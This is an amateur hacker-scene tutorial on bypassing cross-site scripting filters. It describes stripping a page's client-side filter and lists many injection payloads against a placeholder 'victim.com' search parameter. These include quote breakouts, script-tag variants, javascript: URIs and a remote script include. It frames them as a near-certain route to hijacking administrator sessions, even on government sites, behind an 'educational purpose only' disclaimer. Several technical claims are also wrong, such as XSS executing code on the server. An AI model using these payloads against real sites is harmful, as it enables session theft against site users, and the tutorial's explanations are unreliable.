/*Cross Site Scripting filtration Bypass Arham Muhammad rko.thelegendkiller@gmail.

com */ ________________________________________________________________________________ _____________________________________________

_1 __________________________________________ Introduction To Xss(Cross site scripting): 'Cross-Site Scripting' also known as 'XSS' in short is a kind of vulnerability t hat exist in era of both web applications as well as os based applications, but in most cases in web applications.You migh t be wondering why it's known as 'xss' not 'css' reffering to the full form.Well, basically css is already a reserved abbre viation of 'Cascade Style Sheets'.It allows malicious code to be executed on a vulnerable server most probably session hijac king to gain administrator privileges. Xss totally depends on cookies and session and though 'cookies' are known as the backbone of Cross-Site Scripting Vulnerability. _2 _______________________________ Brief Description On The Paper: The paper is based on the bypassing of filtration of a common web application se curity hole known as Xss(Cross site scripting). Xss being a common hole is winning attention of webma sters and their concerns about the afteraffects and the danger that can be exploited through a possible x ss hole, and because of this most webmasters are patching or acutally it can be said they are filtering and s anitizing common known xss injection strings to deny a malicious input or request to overcome xss holes. These people think that it's just enough to filter some common known strings and boom that's it, but it's not likely to say that you have 'filtered' the holes with just some common known characters . ________________________________________________________________________________ __ _3 _____________________________________________ Common Xss Strings To Inject: Basically, javascript and html and in some cases vbscript is injected through a xss vulnerability in a particular server.Php can't be injected since it's server-side and is executed on the very moment.Thus we will first analyse some common xss strings to inject.

1{ <html><font color="Red"><b>Pwned</b></font></html> This is a basic html injection and if you are able to execute it on a vulnerable server you will see the message 'pwned' somewhere on the vulnerable site. 2{ <script>alert('xss')</script> This is a basic javascript injection which will display a pop-up box with the me ssage 'xss' on it. 3{ "><script>alert('xss')</script> This is a secondary javascript injection to the vulnerable server, which is also mostly patched on most servers being a common string. ________________________________________________________________________________ ____________________________ _4 _____________________________________________ Xss Filteration Pattern And Overcoming It: Webmasters mostly filter common strings in javascript to prevent hijacking, whic h means a gurantee bypass on the server, since javascript is client-side and once the page is saved and altered, the hack er comes to the scene! We will now examine the filtration pattern in javascript. ----------------------------------------------------<script Language="JavaScript"> function denyxssreplacestring() { var length = document.forms[0].elements.length; for (var i = 0; i < document.forms[0].elements.length; i++) } { if (document.forms[0].elements.value != malstring(document.forms[0].elements.val ue)) } { alert ("Cross-Site Scripting Attempt!"); return (false); } function malstring(string) { string = string.replace(/\</g,""); string = string.replace(/\>/g,""); string = string.replace(/\+/g,""); return (string); } //--></script> ----------------------------------------------------Now we see that the javascript is sanitizing user's input and keeping in view th e length of string, which if exceed the length or input any malicious string, it will abort the request excluding unsani tized strings, remove the string and generate an alert message.

How simple, if we just save the page with xss filtration and alter it and remove the javascript, save again and inject some ~censored~, bump! it works! Now you might be wondering that if we alter the page, then save and inject, it's of no use, since the server side work is finished, but you are wrong! Lets take an example of a search form -------------------------------------FORM ACTION="search.php" METHOD="GET"> <INPUT TYPE="Hidden" NAME="search" VALUE=""> -------------------------------------Now we see the server is making a 'GET' Request, which means our altered page wi ll work for sure! Since it's sending a get request to 'search.php' without any filteration and wow! what we have here is a nice old vulnerable server to hijack session or exploit some other way! _5 ____________________________________________________ Bypassing Xss Simple Filteration Without Alteration: Now we notice, the above script we used for filtration is evolving only a few st rings, knowing there are bunch of ways and strings to inject a malicious request. It's only filtering '< > /' means leaving hackers with a vast amount of other st rings to inject a malicious code. Now the question is since '<' and '>' are filtered, how we will be able to send a javascript or html code injection? Well, the answer is quite easy, javascript can be executed using ' and " before the orignal script. For instance, ')alert('xss'); This will generate an alert box again on a vulnerable server. Secondly, ");alert('xss'); This will too generate an alert box on a vulnerable server. ___________________________________________________________ _6 __________________________________________________________ Bypassing Advance Xss Filtration: Some webmasters filter lot more than this, especially it's filtered on important

sites like gov and org sites. But all depends on their pattern if they are doing this in javascript, we will o f course just alter the page but what if the filtration is not in javascript, instead is in html or php or even asp. There's nothing impossible, we will try to get as much info about the filtration as much we can. Supposing a server that have filtered all strings just more than common in a way that it reads the malicious string in the beginning or in the end to avoid and abort it, this of course can be bypassed to o! An example can be likely so: helloworld<script>alert('xss')</script> The above script will bypass filtration for the server that reads the malicious string in the beginning. helloworld<script>alert('xss')<script>helloworld This will bypass filtration on server that reads whether in the beginning or in the end or at both ends! Mostly, this kind of filtration isn't common, so cant be of much use! Some webmasters also filter the word 'xss' so it's likely to use some other mess age for making an alert. <script>alert('hello world')</script> This will bypass message filtration. Now we will study some more advance filtration bypass. Some webmasters just simply define a pattern of a cross-site scripting script th at is possibly common. In this case, I will mention here the full array of strings to inject, bypassing the filtration. We will suppose injecting in a search form. victim.com/search.php?query="><script>alert('hello world')</script> victim.com/search.php?query="><script>alert("hello world")</script> victim.com/search.php?query="><script>alert("hello world");</script> victim.com/search.php?query="><script>alert(/hello world");</script> victim.com/search.php?query=//"><script>alert(/hello world/);</script> victim.com/search.php?query=abc<script>alert(/hello world/);</script> victim.com/search.php?query=abc"><script>alert(/hello world/);</script> victim.com/search.php?query=abc"></script><script>alert(/hello world/);</script> victim.com/search.php?query=abc//abc"></script>alert(/hello world/);</script> victim.com/search.php?query=000"><script></script><script>alert(1337);</script> victim.com/search.php?query=000abc</script><script>alert(/1337/);</script> victim.com/search.php?query=--<script>"></script>alert(/1337/);</script> victim.com/search.php?query=pwned<script>document.write('abc');</script> victim.com/search.php?query=pwned</script><script>document.write(1337);</script>

victim.com/search.php?query=pwned')alert(1337);// victim.com/search.php?query=pwned";)alert(1337);// victim.com/search.php?query=pwned");alert(/pwned/);// victim.com/search.php?query=pwned//"></script><script>location.href='javascript: alert(/pwned/);</script> victim.com/search.php?query="><img src='javascript:alert('xss');'> victim.com/search.php?query="><script src='http://malicous js'</script> -------------------------------------------------------------------------------These are some of the advance arrays of javascript code injection on a vulnerabl e server through xss. This includes a quite advance range, bypassing the filtration pattern from alpha to numeric and alpha-numeric, overcoming, if the word 'alert' is filtered, with 'document.write' and 'location .href' functionality, and of course you can do a lot addition in it as long as you know what exactly a re you doing :p overcoming simple and both advance filtration pattern, giving a 99% chance to su cceed in all aspects! ________________________________________________________________________________ __________________________ Conclusion: The paper is based on bypassing both simple and advance filtration patterns and gaining infinity advantages! I wrote this article, as "Cross-Site Scripting" being in my interest and this pa per is for educational purpose only! I don't hold any responsibility for any misuse or real-time exploitation from th is paper! ________________________________________________________________________________ ___________________________ / Shouts ANd Greets To: str0ke,USMAN,tushy,Hackman,shubham,Fix and all my friend s!